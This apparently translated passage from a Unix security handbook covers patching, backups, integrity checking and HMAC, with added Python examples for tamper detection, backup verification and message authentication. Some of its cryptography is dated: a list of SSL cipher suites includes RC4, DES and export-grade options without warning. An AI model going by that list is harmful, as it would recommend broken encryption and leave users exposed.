FreeBSD, NetBSD, and OpenBSD use CVS to distribute and maintain the core software of their operating systems. In addition, tens of thousands of open source software projects maintain their own CVS servers or are hosted on sites such as sourceforge.net that provide CVS repositories. A good CVS reference is the book Essential CVS, published by O'Reilly and Associates.

Upgrading System Software

Before a system is connected to the network, it is essential to make sure that the patches for all known security problems in the software you run have been applied. Likewise, once the system is in operation, you must stay alert for newly discovered security problems in the operating system and applications, so that you can apply fixes as soon as they are released.

The safest way to patch newly installed software is to download the patches through another Internet-connected computer that has been brought up to date with the latest security fixes (for example, a Mac client or a personal computer that offers no server services).
Once the updates have been downloaded, they can be transferred on a CD, or carried to the new system over a local network connection, and applied. This approach is also appropriate when you have several computers running the same operating system that need updating, and repeated downloads of the updates would slow down your network connection. The updates can be transferred just once and run from the CD on each machine. For Microsoft systems, the WindowsUpdate Catalog web site makes downloadable updates available.

If no Internet-connected host is available or suitable for this, the new host may have to be connected to the Internet before the patches have been applied. In that case, disable all network servers on the machine and keep the connection time as short as possible (only as long as it takes to download the required patches), and then physically disconnect the machine from the network while the patches are being installed. This process can be made safer still if the machine's connection is protected by a stateful firewall or a router that performs network address translation, so that the only packets that can reach the new host are those associated with a connection initiated by the new host.

You cannot keep software up to date if you do not know whether you have installed it. An important part of the update process is discovering and tracking new applications that have been installed. Operating systems that use packages usually have commands that let you determine which packages are installed. Source-based management usually relies on keeping the source code of all installed applications in a single, easily accessible location.
Notes on Patches

There are a few more things to know about security problems and patches for operating systems and applications:

• The various Unix-based operating systems and most major applications, such as network servers, have mailing lists for announcing new releases. Microsoft offers e-mail delivery of its security bulletins through the Microsoft Profile Center (http://register.microsoft.com/regsys/pic.asp). Many vendors provide a separate mailing list for announcing security issues. Subscribe to these lists and pay attention to the messages.
• Various mailing lists such as BugTraq and NT-BugTraq collect and publish security alerts for many products. Subscribe to these lists (for example, in digest mode) and pay attention to the messages.
• Many developers of operating systems and applications post security announcements to relevant Usenet newsgroups (for example, announcements for the BIND server appear in comp.protocols.dns.bind). Check these newsgroups regularly.
• If your vendor distributes a CD containing patches, use it. Although these CDs may not include the patches released up to the very moment, they can save a great deal of Internet connection time when a new system is set up, because they reduce the number of patches that have to be downloaded.
• Automatic update systems compare the installed packages with the latest versions available on the vendor's web site and report which packages are out of date. Most of them can also be configured to download and install upgraded packages automatically. This capability can be useful if you trust the vendor to update your system. Some can start automatically on a predefined schedule, and others must be run manually.
• Finally, you can manually check the vendor's web site from time to time for new versions of the software.

As soon as you learn of security patches, do not hesitate: apply them immediately. Publicly announced vulnerabilities are exploited almost at once. (Patches that add new features to the system in addition to fixing security vulnerabilities are not as urgent.)

Downloading and Verifying Patches

Whether you use package-based or source-based patches, you have to get the files from somewhere. Vendors usually make their applications available on the Internet through the World Wide Web or an anonymous FTP site. When an operating system or application becomes popular, a single web or FTP site cannot handle the flood of download requests, so many software vendors arrange for other sites to act as mirror sites that provide the same service as their main site. Users are then encouraged to download the software from the nearest mirror site (in terms of network geography). All the software on the vendor's site is usually copied to the mirror sites at regular intervals (typically daily).

Mirror sites are an important security benefit because they increase software availability through redundancy. They are also very useful when you have a fast connection to one of the mirror sites and a slow connection to the main site. On the other hand, mirror sites raise several security concerns:

• The administrators of the mirror sites control their local copies of the software and may be able to corrupt them, replace them with a Trojaned version, and so on. In that case you must trust not only the vendor but also the administrators of the mirror site. If the vendor publishes digital signatures along with its software (for example, PGP signatures with source code archives, gnupg signatures in rpm files, or signed ActiveX programs), then, because you can obtain the vendor's public key directly from the vendor's own site rather than from the mirror, you can be more confident that the software you receive is the same software the original vendor released. Some update systems automatically check the signatures of patches before applying them.
• Even if you trust the mirror site, the mirror's daily update may not be fast enough for your purposes. If a critical security patch is released, you may not be able to wait 24 hours for your local mirror to be updated. In such cases there is no alternative to downloading the patches directly from the original vendor's site.

Be very careful about applying patches that you find on mailing lists and public bulletin boards. At worst, such patches may have been created to trick people into installing a new vulnerability on their systems; at best, they are usually written by inexperienced programmers whose systems differ from yours, so their solution may do more harm to your system than good.

Upgrading Applications

Under Unix-based package management systems, upgrading a package is usually a very simple process. For example, to upgrade the bzip2-devel package on a system that uses RPM package management, the following commands are needed:

    # ls -l *.rpm
    -rw-r--r-- 1 root root 33708 Apr 16 23:15 bzip2-devel-1.0.2-2.i386.rpm
    # rpm -K bzip2-devel-1.0.2-2.i386.rpm          (Check the checksum and signature)
    bzip2-devel-1.0.2-2.i386.rpm: md5 OK
    # rpm -Uvh bzip2-devel-1.0.2-2.i386.rpm        (Upgrade the package)
    Preparing...      ########################################### [100%]
    1:bzip2-devel     ########################################### [100%]
    # rpm -q bzip2-devel                           (Confirm that the version is now 1.0.2-2)
    bzip2-devel-1.0.2-2

Installing a Solaris security patch is similarly easy. After downloading patch 104489-15.tar.Z from the http://sunsolve.sun.com web site, the installpatch script is used to install the patch:

    % ls *.tar.Z
    104489-15.tar.Z
    % uncompress *.Z
    % tar xf 104489-15.tar
    % cd 104489-15
    % ls
    .diPatch*          SUNWtltk/    backoutpatch*   postbackout*
    Install.info*      SUNWtltkd/   installpatch*   postpatch*
    README.104489-15   SUNWtltkm/   patchinfo*
    % su
    Password: password
    # ./installpatch .
    Checking installed patches...
    Generating list of files to be patched...
    Verifying sufficient filesystem capacity (exhaustive method)...
    Installing patch packages...
    Patch number 104489-15 has been successfully installed.
    See /var/sadm/patch/104489-15/log for details
    Executing postpatch script...
    Patch packages installed:
    SUNWtltk
    SUNWtltkd
    SUNWtltkm
    # showrev -p | egrep 104489
    Patch: 104489-01 Obsoletes: Packages: SUNWtltk, SUNWtltkd
    Patch: 104489-14 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm
    Patch: 104489-15 Obsoletes: Packages: SUNWtltk, SUNWtltkd, SUNWtltkm

If you use source-based management, upgrading requires either a CVS checkout of the changed source code or applying a patch to the old source code to bring it up to date. In either case the source code must be recompiled and then installed. Here is an example of applying a patch to an application:

    % ls -ld *
    -rw-rw---- 1 dunemush dunemush 188423 Jul 20 12:07 1.7.5-patch09
    drwx------ 10 dunemush dunemush 4096 Jul 4 16:15 pennmush/
    % cd pennmush
    % patch -p1 -s < ../1.7.5-patch09
    % make
    ....source code compile messages...
    % make install
    ...installation messages...
    %

If you are upgrading a server program, you must stop the server process and start it again so that the newly installed version runs; merely replacing the server program on the hard disk is not enough for the new version to take the place of the old one.

Upgrading applications on Windows systems is somewhat less uniform. If the application is one of Microsoft's core programs, such as Internet Explorer or Media Player, the WindowsUpdate updater takes care of it; but every other piece of software has to provide its own upgrade method. Some may force you to uninstall the older version before you can install the new one; for some it may be enough to install the new version over the old one; and others may have their own upgrade procedure (antivirus programs are good examples). You will have to handle each program in its own way.

Backing Out and Backing Up

Updating is not always the answer. Sometimes upgrades cause more new problems on the system than they solve, either because they break important functionality or because they fail to fix the intended problem. It is important to be able to return the software to its pre-upgrade state if the applied upgrade turns out to be problematic.
There are two basic strategies for recovering from a bad upgrade. First, it may be possible to back out the patch and restore the previous version. Under source-based management systems, the patch program can also be used to remove a previously applied patch, or the previous version can be retrieved from a CVS repository. Backing out a package cleanly and painlessly can be much harder. Although most package management software provides a way to overwrite the installed software with an older version, if the package's dependencies have also changed you may need to find and install older versions of those dependencies as well. Most (but not all) patches released by Microsoft are able to uninstall themselves or give the user instructions for uninstalling.

The second strategy, for source-based management systems, is to keep backups of older versions of the software. With older versions of the source code on hand, reinstalling the previous version is generally not difficult. Multiple versions can be kept in separate directories under /usr/src, or a version control system such as RCS or CVS can be used locally to track multiple versions of the software in a single directory.

Perhaps the safest approach is to make a complete backup of the system before making changes, so that if the upgrade does not install correctly the system can be returned to its previous state.

Monitoring Integrity

Making sure that system software is up to date, and installing new patches when they are released, is an important part of maintaining integrity. Equally important is making sure that system software, and your valuable information, does not change when you do not expect it to. Ideally, no unauthorized user or process should be able to tamper with your information. In practice you need to monitor your information continuously so that you can detect tampering if it occurs, and archive your information in such a way that you can restore it to its previous state.
Tampering

There are several different ways to combat tampering. In addition to organizing user and file permissions carefully, important files that change infrequently can be kept on read-only media. Files can also be encrypted, so that changing the information in them requires passing through additional security steps. (Even so, it may still be possible to delete or corrupt these files.)

There are also many ways to detect tampering. On smaller systems, or when the number of key files that must be protected is limited, backing files up onto write-once media can be an effective strategy. The files are compared regularly with their archived counterparts; if a file is corrupted, the backup copy can be used to restore it, and when an authorized change is made to a file, the backup copy is brought into line with it.

Cryptographic digests of important files can be computed and stored offline, or protected with encryption. As mentioned earlier, an important property of cryptographic digests is that it is not possible to produce a new file whose digest matches the computed digest. Some antivirus systems can perform a similar function, often called inoculation, in which checksums are embedded in executable files. Chapter five gives a more detailed discussion of using comparison files and cryptographic digests for ongoing auditing of system data.
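The baseline-and-compare check described above, as an added example that is not part of the handbook: it records a digest and the permission bits of every file under a directory and later reports what was modified, added or removed. It uses SHA-256 instead of the MD5 that the text names earlier, because MD5 collisions can now be produced in practice; the function names and the sample tree are constructed for illustration.

```python
import hashlib
import os
import stat
import tempfile


def file_digest(path, chunk_size=65536):
    """Stream a file through SHA-256 so large files never sit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Return {relative path: (digest, permission bits)} for regular files."""
    state = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):
                continue  # symlinks, devices and sockets are out of scope here
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            state[rel] = (file_digest(full), stat.S_IMODE(st.st_mode))
    return state


def compare(baseline, current):
    """Classify every difference between the trusted baseline and now."""
    report = {"modified": [], "mode_changed": [], "added": [], "removed": []}
    for rel in sorted(baseline):
        if rel not in current:
            report["removed"].append(rel)
        elif current[rel][0] != baseline[rel][0]:
            report["modified"].append(rel)
        elif current[rel][1] != baseline[rel][1]:
            report["mode_changed"].append(rel)
    report["added"] = sorted(set(current) - set(baseline))
    return report


def demo():
    """Constructed scenario: baseline a small tree, change it, re-check."""
    with tempfile.TemporaryDirectory() as root:
        files = {
            "bin/login": b"#!/bin/sh\nexec /bin/real-login\n",
            "etc/passwd": b"root:x:0:0::/root:/bin/sh\n",
            "etc/hosts": b"127.0.0.1 localhost\n",
        }
        for rel, data in files.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(data)
            os.chmod(full, 0o644)
        # In practice the baseline is stored offline or on write-once media.
        baseline = snapshot(root)

        login = os.path.join(root, "bin", "login")
        before = os.stat(login)
        changed = files["bin/login"].replace(b"/bin/real-login",
                                             b"/tmp/fake-login")
        with open(login, "wb") as fh:
            fh.write(changed)  # same length as the original content
        # Restore the old timestamps: size and mtime now look untouched.
        os.utime(login, ns=(before.st_atime_ns, before.st_mtime_ns))
        os.chmod(os.path.join(root, "etc", "passwd"), 0o666)
        os.remove(os.path.join(root, "etc", "hosts"))
        with open(os.path.join(root, "bin", ".hidden"), "wb") as fh:
            fh.write(b"unexpected file\n")

        return compare(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

The changed file keeps its original size and modification time, so only the digest comparison exposes it.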
Backups

Flaws, accidents, natural disasters, and attacks on a system cannot be predicted, and despite the best efforts they usually cannot be prevented; but if you have backups, you can repair your system and bring it to a stable state. Even if you lose your entire computer, to a fire for example, with a complete set of backups you can recover your information after buying a replacement machine. The cost of a new processor and disk drive may be covered by the insurance company, but your information is something that in many cases will be irreplaceable.

Years ago, making daily backups became common practice because computer hardware would often fail for no apparent reason, and a backup was the only way to guard against data loss. Today hardware failure is still a good reason to back up systems. Hard disk failure is essentially random: even if a good hard disk lasts 5 years or a little more on average, an organization with some 20 to 30 hard disks should expect a significant failure every few months. Disk drives usually fail without warning, sometimes only a few days after being put into service. The sensible course is therefore to back up the system at regular intervals.

Backups can also be an important tool for securing computers against attacks. In particular, a full backup allows you to find what an attacker has changed by comparing the files on the computer with the files on the backup. Make the first backup of your system after installing the operating system, and after that install your applications and apply the necessary security patches. This first backup not only lets you analyze your system after an attack to find out what has changed; in the event of a hardware failure it can also reduce the downtime needed to rebuild the system.

How to Make Backups

Many different forms of backup are in use today, including the following:

• Copying critical files to an optical disk or a high-capacity removable magnetic disk;
• Periodically copying a disk to a spare or mirror disk;
• Mirroring two disks simultaneously using hardware or software RAID (Redundant Array of Independent Disks) systems;
• Making periodic zip, sit, or tar archives of important files, which you can keep on the primary system or at another location;
• Backing up to optical or magnetic tape; and
• Backing up files over a network or the Internet to another computer that you own, or to an Internet backup service.

Some of these services can be quite sophisticated. For example, they can examine the MD5 checksums of your files and back up only the files that are unique. In that case, if you have thousands of computers that all have Microsoft Office on them, none of those programs' files are added to the backup.

What Should You Back Up?

There are two general approaches to computer backup systems:

1. Back up everything that is unique to your system: user accounts, data files, and important system directories that have been customized for your computer. This approach saves tape or disk and reduces the time needed to make a backup. If the system fails, you begin recovery by reinstalling your computer's operating system and then reinstalling all applications, and after that you restore your backup tapes.
2. Back up everything, because restoring a complete system is easier than restoring a piece of one, and tape is cheap.
In general the second approach is to be preferred. Although some of the information you back up is already "backed up" on the original distribution disks or tapes that you used to load the system onto the hard disk, distribution tapes and disks sometimes get lost. Moreover, as your system ages, programs get installed in the operating system's reserved directories, just as security holes are discovered and fixed and other changes take place. If you have ever tried to rebuild your system after a failure, you know how much easier the process is when everything is in its place.

For this reason, it is recommended that you save everything on your system (meaning everything needed to reinstall the system, including all of the final files) to backup media at set intervals. The length of this interval depends on the speed of your backup equipment, the amount of storage space allocated to backups, and the needs of your organization. You may want to make a full backup once a week, or you may want to do so only twice a year.

Types of Backups

There are three general types of backups: level-zero (day-zero) backups, full backups, and incremental backups.

Level-zero (day-zero) backup
Makes a copy of your original system. When your system is first installed, before people begin using it, back up every file and program on the system. If this backup is made after a successful break-in, it may be completely worthless.

Full backup
A copy of every file on the computer is written to the backup. This is similar to a day-zero backup, except that it is done at regular intervals.
Incremental backup
Only those files are copied that have changed since a particular event (such as the patching of a vulnerable application) or a particular date (such as the date of the last full backup). Full and incremental backups are usually used together. A common backup strategy today is as follows:

• Make a full backup on the first day of the week, every other week; and
• Make an incremental backup at the end of each event that occurs on the system after the last full backup. Because this kind of incremental backup archives those files that have changed since the last full backup was made, it is sometimes called a differential backup.

Most administrators of large systems plan and store their backups by partition or disk drive. Different partitions usually require different backup strategies. On the view that every change you make is highly significant, some partitions, such as your system partition (if they are separate), should normally be backed up every time a change is made to them. For these systems, full backups should be used rather than incremental ones, because their backup is usable only if it is complete. Likewise, partitions that are used only for storing applications need to be backed up only when new programs are installed or the configuration of existing programs changes.

On the other hand, incremental backups are better suited to partitions used for storing user files; but you may want to make this kind of backup frequently, so as to minimize the amount of work you could lose if a failure occurs.

When you make incremental backups, use a rotating set of backup tapes or disks.
Tonight's backup should not be written onto the tape that was used for last night's backup. Otherwise, if the computer fails in the middle of tonight's backup, you will lose everything: the data on the disk, the data in tonight's backup (because it is incomplete), and the data in last night's backup (because part of it has been overwritten by tonight's backup). Ideally, perform an incremental backup once a night, and have a separate tape for every night of the week.

How Long Should You Keep a Backup?

It may take a week or a month before you notice that a file has been deleted. You should therefore keep some backup tapes for a week, some for a month, and some for several months. Many organizations archive their yearly or quarterly backups permanently. Some organizations also keep their annual or biennial backups forever, since doing so is a small investment compared with the possibility that they may one day be needed. In some countries there may be legal requirements that mandate keeping backups of certain kinds of data (such as accounting records) for a minimum period. On the other hand, it is also important to have a data destruction policy that specifies the maximum time for which backups are kept.

You may want to keep an index or list of the names of the files on your backup tapes. That way, whenever you need to restore a file, you can find the right tape to use by checking the list, instead of having to read each tape one by one. Keeping a printed copy of these lists is also a good idea, especially if your electronic list sits on a system that may itself need to be restored!
If you keep backups for a long time, make sure that when you buy a new backup system the backup data is properly migrated to it. Otherwise you may end up with tapes that cannot be read by anyone, anywhere. This has happened to major research universities and even to the U.S. National Aeronautics and Space Administration (NASA).

Other Backup Tips

There are a few more good practices for increasing backup reliability:

Use tandem backup sets
You can use two separate sets of backup tapes to create tandem backups. With this backup strategy, you make two full backups (called A and B). Then, when you make your first incremental backup, incremental A, you back up all the files that were created or modified after the last A backup, even if they are on the B backup. The second time you make an incremental backup, incremental B, you write all the files that were created or modified after the last B backup, even if they are on the incremental A backup. This system is resilient against backup media failure, because every file is backed up in two places, although it doubles the time you spend making backups.

Replace tapes as needed
Tapes are physical media, and each time you run them through a tape drive their quality degrades somewhat. Based on your own experience with your tape drive and tapes, you should set a useful lifetime for each tape. Some vendors set limits for their tapes (for example, 3 years or 2000 cycles), but others do not. Pay close attention to what the vendor recommends in this regard, and do not exceed it. Remember that the money you save by using a tape beyond its useful life is not worth the cost of a major loss that cannot be recovered.
Keep your tape drives clean
If you store your backups on tape, follow the tape drive vendor's preventive maintenance schedule and use an appropriate cleaning cartridge or other mechanism as recommended. Being unable to read a tape because the tape drive is dirty is annoying; it is especially so when it turns out that the data you wrote to the tape is corrupt and cannot be used when a failure occurs.

Verify the backup
From time to time you should try to restore a few randomly chosen files from your backups, to make sure that your equipment and software are working properly. There are many stories about computer centers that lost their disk drives and, when they turned to their backup tapes, found them unreadable. This can be the result of poor-quality tapes, improper backup procedures, faulty software, operator error, or other problems.

At least once a year you should try to restore your entire system from backups, to make sure that your backup system is working properly. Start with a different, unconfigured computer, and see whether you can restore all your tapes and get the computer running. Sometimes you will find that some important files are missing from your backup tapes. These practical tests are the best time to discover problems and fix them.

A very good test is to pick a file at random once a week or once a month and try to restore it. Not only will this show whether the backups are comprehensive, but the practice gained from these restores may make a real restore operation much easier.

A detailed discussion of backup and restore systems could fill a separate book; W. Curtis Preston's book Unix Backup and Recovery, published by O'Reilly, is an excellent example.
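An added example (not from the handbook) of two practices from this chapter: an incremental backup that copies only the files changed since the last full backup, and the periodic random restore test recommended under "Verify the backup". It assumes plain tar archives and a digest manifest recorded at backup time; the function names, timestamps and sample files are constructed.

```python
import hashlib
import io
import os
import random
import tarfile
import tempfile


def make_backup(root, archive_path, since=None):
    """Write a tar backup of root and return a manifest {path: sha256}.

    since=None copies every file (full backup); otherwise only files whose
    modification time is later than `since` are copied (incremental backup).
    """
    manifest = {}
    with tarfile.open(archive_path, "w") as tar:
        for dirpath, dirnames, filenames in os.walk(root):
            dirnames.sort()
            for name in sorted(filenames):
                full = os.path.join(dirpath, name)
                if os.path.islink(full) or not os.path.isfile(full):
                    continue  # this example handles regular files only
                if since is not None and os.path.getmtime(full) <= since:
                    continue  # unchanged since the reference backup
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                with open(full, "rb") as fh:
                    data = fh.read()
                info = tar.gettarinfo(full, arcname=rel)
                info.size = len(data)
                tar.addfile(info, io.BytesIO(data))
                # Digest of exactly the bytes that went into the archive.
                manifest[rel] = hashlib.sha256(data).hexdigest()
    return manifest


def verify_sample(archive_path, manifest, sample_size, rng=random):
    """Restore a random sample from the archive and check it.

    Returns a list of (path, problem); an empty list means every sampled file
    could be read back and matched the digest recorded at backup time.
    """
    names = sorted(manifest)
    chosen = sorted(rng.sample(names, min(sample_size, len(names))))
    try:
        tar = tarfile.open(archive_path, "r")
    except (tarfile.TarError, OSError) as exc:
        return [("<archive>", "unreadable: %s" % exc)]
    problems = []
    with tar:
        for rel in chosen:
            try:
                member = tar.extractfile(rel)
                data = member.read() if member is not None else None
            except (KeyError, tarfile.TarError, OSError):
                data = None
            if data is None:
                problems.append((rel, "cannot be restored"))
            elif hashlib.sha256(data).hexdigest() != manifest[rel]:
                problems.append((rel, "digest mismatch"))
    return problems


def demo():
    """Constructed data: full backup, a later change, incremental, restore test."""
    with tempfile.TemporaryDirectory() as work:
        root = os.path.join(work, "home")
        os.makedirs(os.path.join(root, "alice"))
        samples = {"alice/notes.txt": b"ORIGINAL notes\n",
                   "alice/todo.txt": b"buy tapes\n",
                   "motd": b"welcome\n"}
        for rel, data in samples.items():
            path = os.path.join(root, *rel.split("/"))
            with open(path, "wb") as fh:
                fh.write(data)
            os.utime(path, (1000, 1000))   # every file predates the full backup
        full_tar = os.path.join(work, "full.tar")
        full = make_backup(root, full_tar)
        full_time = 2000                    # constructed time of the full backup

        todo = os.path.join(root, "alice", "todo.txt")
        with open(todo, "ab") as fh:
            fh.write(b"label tapes\n")
        os.utime(todo, (3000, 3000))        # changed after the full backup
        incr = make_backup(root, os.path.join(work, "incr.tar"), since=full_time)

        healthy = verify_sample(full_tar, full, 3, random.Random(7))
        with open(full_tar, "rb") as fh:
            raw = fh.read()
        with open(full_tar, "wb") as fh:    # simulate silent media damage
            fh.write(raw.replace(b"ORIGINAL", b"DAMAGED!", 1))
        damaged = verify_sample(full_tar, full, 3, random.Random(7))
        return sorted(full), sorted(incr), healthy, damaged
```

The simulated damage leaves the archive structurally valid, so only reading the file back and comparing digests reveals it.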
Transmission integrity

Cryptography offers a way to be sure that when you send data across a network to someone else, the recipient receives it exactly as you sent it, protected against accidental corruption or deliberate tampering. A common strategy is to sign the file digitally, by computing a cryptographic digest and encrypting the digest with a symmetric or asymmetric algorithm, and then to send the result along with the file (which may itself be encrypted for confidentiality). The recipient recomputes the digest from the file and then decrypts the transmitted digest. If the two match, the integrity of the message is assured.

The hash message authentication code (HMAC) is another way to verify the integrity of a message transmitted between two parties who have agreed on a shared secret key. HMAC combines the original message and a key to compute a message digest function of both. Sometimes additional information, such as protocol sequence numbers, is also included to defeat replay attacks. The sender computes the HMAC of the message, the key, and any additional information, and transmits the HMAC together with the original message. The recipient recomputes the HMAC from the message and its own copy of the secret key (along with the additional information, such as the expected sequence number) and then compares the computed HMAC with the received HMAC to see whether they match. If they match, the message digest has not changed, so the recipient knows that the original message has not been altered.

HMACs are usually used to harden network protocol messages against tampering, because they are much faster to compute than digital signatures and are also smaller. On the other hand, HMACs rest on a shared key that must be protected from compromise, whereas digital signatures usually work with public key systems.

Several general-purpose cryptographic protocols have been built to secure network connections. These protocols are usually assembled from a combination of cryptographic algorithms so as to support key exchange, authentication, encryption, and message integrity verification, together with a specification of how a client and a server agree on algorithms, exchanged credentials, and session keys. For example, the SSL/TLS protocol supports these combinations of algorithms:

EDH-RSA-DES-CBC3-SHA SSLv3 Kx=DH Au=RSA Enc=3DES(168) Mac=SHA1
EDH-DSS-DES-CBC3-SHA SSLv3 Kx=DH Au=DSS Enc=3DES(168) Mac=SHA1
DES-CBC3-SHA SSLv3 Kx=RSA Au=RSA Enc=3DES(168) Mac=SHA1
DHE-DSS-RC4-SHA SSLv3 Kx=DH Au=DSS Enc=RC4(128) Mac=SHA1
RC4-SHA SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=SHA1
RC4-MD5 SSLv3 Kx=RSA Au=RSA Enc=RC4(128) Mac=MD5
EXP1024-DHE-DSS-RC4-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=RC4(56) Mac=SHA1 export
EXP1024-RC4-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=SHA1 export
EXP1024-DHE-DSS-DES-CBC-SHA SSLv3 Kx=DH(1024) Au=DSS Enc=DES(56) Mac=SHA1 export
EXP1024-DES-CBC-SHA SSLv3 Kx=RSA(1024) Au=RSA Enc=DES(56) Mac=SHA1 export
EXP1024-RC2-CBC-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC2(56) Mac=MD5 export
EXP1024-RC4-MD5 SSLv3 Kx=RSA(1024) Au=RSA Enc=RC4(56) Mac=MD5 export
EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH Au=RSA Enc=DES(56) Mac=SHA1
EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH Au=DSS Enc=DES(56) Mac=SHA1
DES-CBC-SHA SSLv3 Kx=RSA Au=RSA Enc=DES(56) Mac=SHA1
EXP-EDH-RSA-DES-CBC-SHA SSLv3 Kx=DH(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-EDH-DSS-DES-CBC-SHA SSLv3 Kx=DH(512) Au=DSS Enc=DES(40) Mac=SHA1 export
EXP-DES-CBC-SHA SSLv3 Kx=RSA(512) Au=RSA Enc=DES(40) Mac=SHA1 export
EXP-RC2-CBC-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC2(40) Mac=MD5 export
EXP-RC4-MD5 SSLv3 Kx=RSA(512) Au=RSA Enc=RC4(40) Mac=MD5 export

Each combination specifies the algorithm to use for key exchange (Kx, which can be Diffie-Hellman or RSA), authentication (Au, which can be RSA or DSS), encryption (Enc, which can be DES, triple DES, RC4, or RC2, with a stated key length), and the message authentication code (Mac, which can be SHA1 or MD5).

Chapter Five
Identification and Authentication

Overview

Identification is the association of an identity with a subject. Authentication establishes the validity of an identity, and authorization is the association of rights or privileges with an identity. This chapter concentrates on the first two concepts. Identification and authentication may be carried out entirely by the workstation a person is using, or authentication may be the job of a network-based system in which users' identities are stored on a central server and shared by groups of clients.

Identification techniques

Computers use a variety of identification systems. The simplest are based on usernames and passwords; others rely on special hardware that can measure the distinguishing characteristics of individual human beings. There are also systems based on public key cryptography.

No identification technique is so good that it can never be fooled and bypassed, and fortunately most do not need to be. The goal of most identification systems is not to make impersonation impossible, but to reduce the risk of impersonation and the resulting losses to an acceptable level. Another important goal of identification systems is to quantify the risk that remains once the system has been deployed, because quantifying the residual risk allows an organization to make decisions about policies, about the need or desire for alternative identification systems, and even about the amount of insurance coverage required to protect against possible fraud.
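Returning to the HMAC scheme described under "Transmission integrity" above: the sketch below is an added example, not part of the handbook, showing both sides of an exchange in which the sequence number is fed into the HMAC but never transmitted, so a replayed or altered frame fails verification. HMAC-SHA256, the 8-byte counter encoding, the class names, and the demo key are assumptions made for the illustration.

```python
"""HMAC with an implicit sequence number (added illustration, constructed data)."""
import hashlib
import hmac
import struct

TAG_LEN = hashlib.sha256().digest_size  # 32 bytes for HMAC-SHA256


class IntegrityError(Exception):
    """Raised when a frame fails verification (tampered, replayed or out of order)."""


def compute_tag(key, seq, message):
    # The counter is packed into a fixed 8 bytes so that the boundary between
    # sequence number and message is unambiguous.
    return hmac.new(key, struct.pack(">Q", seq) + message, hashlib.sha256).digest()


class Sender:
    def __init__(self, key):
        self._key, self._seq = key, 0

    def protect(self, message):
        """Return message || tag; the sequence number itself is not sent."""
        frame = message + compute_tag(self._key, self._seq, message)
        self._seq += 1
        return frame


class Receiver:
    def __init__(self, key):
        self._key, self._expected = key, 0

    def accept(self, frame):
        """Verify a frame against the expected sequence number; return the message."""
        if len(frame) < TAG_LEN:
            raise IntegrityError("frame is shorter than a tag")
        message, received = frame[:-TAG_LEN], frame[-TAG_LEN:]
        computed = compute_tag(self._key, self._expected, message)
        # compare_digest does not reveal, through timing, how many bytes matched.
        if not hmac.compare_digest(computed, received):
            raise IntegrityError("tag mismatch at sequence %d" % self._expected)
        self._expected += 1  # advance only after a frame has verified
        return message


def demo():
    """Run a short constructed exchange and report what the receiver accepts."""
    # Constructed demo key; a real key is random, e.g. secrets.token_bytes(32).
    key = hashlib.sha256(b"constructed demo key").digest()
    sender, receiver = Sender(key), Receiver(key)
    f0 = sender.protect(b"transfer 100 to alice")
    f1 = sender.protect(b"transfer 250 to bob")
    f2 = sender.protect(b"close session")
    tampered = b"erase" + f2[5:]  # message changed in transit, old tag kept
    outcomes = []
    for label, frame in [("f0", f0), ("f1", f1), ("replay of f0", f0),
                         ("tampered f2", tampered), ("f2", f2)]:
        try:
            outcomes.append((label, receiver.accept(frame).decode()))
        except IntegrityError:
            outcomes.append((label, "REJECTED"))
    return outcomes


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Because the counter advances only on success, the genuine third frame is still accepted after the replayed and tampered copies have been rejected.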
Physical identification

Fly to an international airport, swipe your credit card through the terminal at a car rental agency, and you can drive off to your destination in a car that may be worth more than twenty thousand dollars. The only assurance the rental agency has that you will bring its car back is your promise, along with the knowledge that if you break your word it can cancel your credit card and you will probably go to jail.

If the rental agency did not know who you were, your promise would mean little to it. It is your driver's license, passport, or credit card, together with a worldwide computer network, that lets the rental agency find out within a few seconds whether your credit card has been stolen, and lets it inform your place of work and the associated insurance company of the trust it has placed in you.

Printed identification documents are designed around the ability to check them physically. A passport is a good identification document because it contains information that can be verified physically (sex, height, weight, photograph, signature), it is hard to forge, it cannot easily be tampered with, and it is issued by a reputable, trusted, and well-known authority that checks the person's identity before issuing the document. A membership card for a press club, by contrast, has none of these properties.

Computer-based identification techniques

User IDs and passwords have been part of very large computer systems for more than fifty years. Even personal computers, which had no passwords for the first two decades of their existence, are now equipped with software that can control access using user IDs and passwords. There is one key difference between systems based on a user ID and password and the document-based systems discussed earlier in this chapter. Although most identification documents are printed with the real name of the person to be identified, systems based on a user ID and password are interested only in establishing that the person sitting at the keyboard is the authorized user of a particular account.
Traditional document-based systems deal with absolute identification, whereas user ID and password systems deal with relative identification, that is, with establishing continuity of authorization. Absolute identification is an extraordinarily difficult task for a computer system. Instead, many relative identification systems have been developed. People experienced in computer security usually describe these systems as being based on "something you know," "something you have," or "something you are." The following sections describe these three traditional approaches, along with a newer one: "someplace where you are."

Password-based systems: something you know

The earliest digital identification systems were based on passwords. In these systems every user is given a user ID and a password; to prove your identity to the computer, you simply type the password. If the password you type matches the password stored in the computer, the assumption is that you are who you claim to be.

Because passwords are easy to use and need no special hardware, they remain the most widely used authentication system in the world today. As a result of this popularity, most of us now have dozens of passwords that we must remember almost every day: personal identification numbers (PINs), access codes for ATM cards, long-distance calling cards, voice mail systems and answering machines, unlocking mobile phones, unlocking desktop computers, dialing in to Internet service providers, retrieving electronic mail, and accessing web sites.

Passwords have several problems, some of which cannot be fixed. They are listed below.

